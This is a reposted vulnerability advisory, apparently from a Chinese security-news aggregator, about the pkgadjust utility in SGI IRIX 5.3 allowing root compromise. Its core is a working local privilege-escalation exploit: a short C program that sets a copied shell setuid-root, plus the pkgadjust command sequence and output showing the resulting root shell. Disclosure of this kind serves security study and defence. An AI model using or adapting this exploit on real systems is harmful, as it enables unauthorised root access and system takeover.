相关推荐: HP Remote Watch权限许可和访问控制漏洞
HP Remote Watch权限许可和访问控制漏洞 漏洞ID 1207634 漏洞类型 未知 发布时间 1996-10-01 更新时间 1996-10-01 CVE编号 CVE-1999-0246 CNNVD-ID CNNVD-199610-002 漏洞平台…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
漏洞ID | 1053343 | 漏洞类型 | |
发布时间 | 1996-09-23 | 更新时间 | 1996-09-23 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | IRIX | CVSS评分 | N/A |
source: http://www.securityfocus.com/bid/419/info
A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account.
% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database
updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh
相关推荐: HP Remote Watch权限许可和访问控制漏洞
HP Remote Watch权限许可和访问控制漏洞 漏洞ID 1207634 漏洞类型 未知 发布时间 1996-10-01 更新时间 1996-10-01 CVE编号 CVE-1999-0246 CNNVD-ID CNNVD-199610-002 漏洞平台…
评论